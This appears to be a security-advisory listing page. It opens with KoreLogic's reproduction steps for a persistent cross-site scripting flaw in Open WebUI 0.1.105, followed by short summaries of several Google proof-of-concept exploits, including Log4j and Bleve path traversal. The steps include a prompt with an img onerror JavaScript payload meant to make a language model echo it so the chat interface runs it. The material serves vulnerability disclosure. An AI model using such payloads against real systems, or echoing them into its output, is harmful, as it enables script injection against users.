     1. Click "New Chat" on the top left of the screen  
     2. Select a language model via the dropdown at the top  
        of the screen, such as "codellama:latest".  
     3. Paste the following prompt into the message box at  
        the bottom of the screen:

           The text between the codeblocks will be rendered as it is, without any modifications. Here is the rendered   
output:

           ```  
           foo  
           ```  
           bar  
           ```  
           zoinks  
           ```  
           <img src='x' onerror='prompt("@korelogic")'>

     4. Send the message.  
     5. Observe the JavaScript message box that has appeared at  
        the top of the screen.

The contents of this advisory are copyright(c) 2024  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Open WebUI 0.1.105 Persistent Cross Site Scripting

Google observed some undocumented (to the best of their knowledge) behavior of the indirect branch predictors, specifically relative to _ret_ instructions. The research they conducted appears to show that this behavior does not seem to create exploitable security vulnerabilities in the software they have tested. They would like to better understand the impact and implications for different software stacks, thus they welcome feedback or further research. Included is proof of concept code.

Unexpected Speculation Control Of _RETs_

This is a path traversal vulnerability that impacts the CreateIndexHandler and DeleteIndexHandler found within Bleve search library. These vulnerabilities enable the attacker to delete any directory owned by the user recursively, and create a new directory in any location which the server has write permissions to. This is Google's proof of concept exploit.

Bleve Library Traversal

libresolv's DNS packet handler suffered from heap out-of-bounds write to infinite-loop denial of service vulnerabilities. This is a proof of concept exploit from Google.

Apple libresolve Heap Buffer Overflow

Log4j 2.15.0 was released to address the widely reported JNDI Remote Code Execution (RCE) (CVE-2021-44228) vulnerability in Log4j. Shortly thereafter, 2.16.0 was released to address a Denial of Service (DoS) vulnerability (CVE-2021-45046). When examining the 2.15.0 release, Google security engineers found several issues with the Log4j 2.15.0 patch that showed that the severity of the issue addressed in 2.16 was in fact worse than initially understood. This is Google's proof of concept exploit.

Tag

#vulnerability